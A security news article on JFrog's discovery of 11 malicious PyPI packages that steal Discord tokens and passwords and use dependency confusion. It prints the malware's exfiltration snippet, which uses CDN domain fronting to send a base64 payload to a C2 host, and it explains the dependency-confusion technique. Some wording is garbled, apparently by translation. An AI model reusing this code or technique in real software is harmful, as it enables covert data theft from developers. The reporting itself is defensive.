Security specialists from the firm JFrog report the discovery of 11 malicious Python packages in the Python Package Index (PyPI) repository, apparently designed for the theft of access tokens to platforms such as Discord, in addition to intercepting passwords and deploying dependency confusion attacks.
The list of malicious packages detected in this research is shown below:
- importantpackage / important-package
- pptest
- ipboards
- owlmoon
- DiscordSafety
- trrfab
- 10Cent10/10Cent11
- yandex-yt
- yiffparty
Among these packages, experts note that “importantpackage”,” “10Cent10” and “10Cent11” seem to establish an inverse layer on the compromised machine. In addition, “importantpackage” abuses the TLS CDN termination for data theft, in addition to using Fastly CDN to hide malicious communications with the C&C server.
According to the report, the communication code for this malware is:
url = “https://pypi.python.org” + “/images” + “?” + “guid=” + b64_payload
r = request.Request(url, headers = {‘Host’: “psec.forward.io.global.prod.fastly.net”})
The researchers note that this code causes an HTTPS request to be sent to pypi.python.org which is subsequently redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.
The dependency confusion technique involves loading contaminated components that have the same name as legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique is really good for tricking package managers into downloading and installing malicious modules.
The researchers conclude by mentioning that while this is an attack similar to other hacking techniques, it does give threat actors a way to act stealthily, plus it could function as the prelude to subsequent attacks.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
He is a well-known expert in mobile security and malware analysis. He studied Computer Science at NYU and started working as a cyber security analyst in 2003. He is actively working as an anti-malware expert. He also worked for security companies like Kaspersky Lab. His everyday job includes researching about new malware and cyber security incidents. Also he has deep level of knowledge in mobile security and mobile vulnerabilities.
